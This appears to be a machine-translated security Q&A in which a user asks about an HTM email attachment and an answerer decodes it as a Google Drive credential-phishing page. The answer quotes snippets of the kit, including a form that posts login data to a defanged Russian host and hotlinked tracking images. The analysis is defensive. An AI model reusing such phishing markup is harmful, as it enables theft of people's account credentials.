今天我收到一封带有 htm 附件的电子邮件,第 m 个包含以下代码:
<html>
<head>
<script>
var url = ""
window.location.href= url;
</script>
</head>
</html>
url 变量被分配了 247251 个字符的巨大值,我觉得这些字符有点垃圾字符只是为了增加 URL 的长度。
我故意没有写 url 内容只是为了避免我没有向他人暴露任何安全威胁。这是我指的垃圾的pastebin。
如果我在任何网络浏览器中打开它,它会造成什么危害?
我解码了你的“垃圾”。这是 base64 编码,太大了,不能放在这里。这是解码结果: http: //pastebin.com/NBV4iY2s
这似乎是 Google Drive 登录页面的附件。事实上,除了少数项目外,所有内容都来自 Google Drive。
这是一次网络钓鱼尝试。
从 line number 可以看出2642,它实际上是在尝试将数据发送到俄罗斯的 Web 服务器:
<form action="hxxp://www.gladiolusfashion.ru/js/fancybox/country.php" id="signup" method="post" name="signup">
它基本上只是试图窃取您的 Google 帐户详细信息。这是一次普通的网络钓鱼尝试。
但是,还有另一个潜在问题:来自英国的热链接图像:
Confirm your identity.<img align="right" border="0" height="33" src="hxxp://www.bountifulbreast.co.uk/images/100Secure.jpg" width="83"></h1>
这可能会提醒该网站的所有者尝试访问该特定图像。如果这些网站的所有者相同,那么您的 IP 地址和访问尝试可能会被记录下来。这可以帮助他们确定网络钓鱼攻击的有效性。“有多少人看这个,有多少人喜欢它?”
图像的网络服务器也有可能遭到入侵。它可能会受到损害,或者只是热链接。很难说。
在顶部,为了避免提醒 Google 的热链接网络钓鱼检测,网络钓鱼者别无选择,只能热链接到免费图标网站以使其具有合法性。您可以在行上看到这一点,2585并且2586:
<link rel="shortcut icon" href="hxxp://icons.iconarchive.com/icons/marcus-roberto/google-play/512/Google-Drive-icon.png">
<link rel="apple-touch-icon" href="hxxp://icons.iconarchive.com/icons/marcus-roberto/google-play/512/Google-Drive-icon.png">
最后,当您提交数据时,它会将您发送到一个虚假页面,说明请求的文件不存在。(粘贴箱)
这种网络钓鱼尝试试图做一些事情:
不要费心打开它。它试图让您输入您的凭据。